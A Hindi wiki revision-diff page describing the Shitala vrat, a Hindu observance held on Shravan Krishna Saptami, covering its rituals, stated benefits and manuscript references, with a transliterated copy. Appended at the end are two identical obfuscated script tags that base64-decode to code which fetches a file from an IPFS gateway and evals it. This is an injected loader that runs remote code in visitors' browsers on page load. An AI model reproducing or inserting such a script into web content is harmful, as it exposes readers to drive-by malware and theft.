Difference between revisions of "शीतला व्रत"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
('*भारत में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा ...' के साथ नया पन्ना बनाया)
 
 
(6 intermediate revisions by 4 users not shown)
Line 1: Line 1:
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
+
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
 
*[[श्रावण]] [[कृष्ण पक्ष]] की [[सप्तमी]] पर कलश स्थापित कर उस पर शीतला की प्रतिमा का पूजन एवं पाठ वर्ष या उससे कम अवस्था की 7 कुमारियों को भोजन कराया जाता है।
 
*[[श्रावण]] [[कृष्ण पक्ष]] की [[सप्तमी]] पर कलश स्थापित कर उस पर शीतला की प्रतिमा का पूजन एवं पाठ वर्ष या उससे कम अवस्था की 7 कुमारियों को भोजन कराया जाता है।
 
*इससे वैधव्य से मुक्ति, दरिद्रता का नाश होता है।
 
*इससे वैधव्य से मुक्ति, दरिद्रता का नाश होता है।
*पुत्रोत्पत्ति आदि का लाभ होता है।<ref>व्रतार्क (पाण्डुलिपि 111-113); अहल्याकामधेनु (पाण्डुलिपि 438बी-440बी)।</ref>  
+
*पुत्रोत्पत्ति आदि का लाभ होता है।<ref>व्रतार्क ([[पाण्डुलिपि]] 111-113); अहल्याकामधेनु (पाण्डुलिपि 438बी-440बी)।</ref>  
 
*कुछ लोग इसे [[श्रावण]] शुक्ल सप्तमी पर करते हैं।  
 
*कुछ लोग इसे [[श्रावण]] शुक्ल सप्तमी पर करते हैं।  
 
*यह केवल नारियों के लिए ही है।  
 
*यह केवल नारियों के लिए ही है।  
*नैवेद्य केवल घी एवं दही का ही होता है।  
+
*नैवेद्य केवल घी एवं दही का ही होता है।
  
{{लेख प्रगति
+
{{main|शीतला सप्तमी}}
|आधार=आधार1
+
 
|प्रारम्भिक=
+
{{लेख प्रगति |आधार= |प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध= }}
|माध्यमिक=
 
|पूर्णता=
 
|शोध=
 
}}
 
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>

Latest revision as of 09:29, 15 June 2018

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.
  • shravan krishna paksh ki saptami par kalash sthapit kar us par shitala ki pratima ka poojan evan path varsh ya usase kam avastha ki 7 kumariyoan ko bhojan karaya jata hai.
  • isase vaidhavy se mukti, daridrata ka nash hota hai.
  • putrotpatti adi ka labh hota hai.[1]
  • kuchh log ise shravan shukl saptami par karate haian.
  • yah keval nariyoan ke lie hi hai.
  • naivedy keval ghi evan dahi ka hi hota hai.
  1. REDIRECTsaancha:mukhy


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

  1. vratark (pandulipi 111-113); ahalyakamadhenu (pandulipi 438bi-440bi).

any sanbandhit liank

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>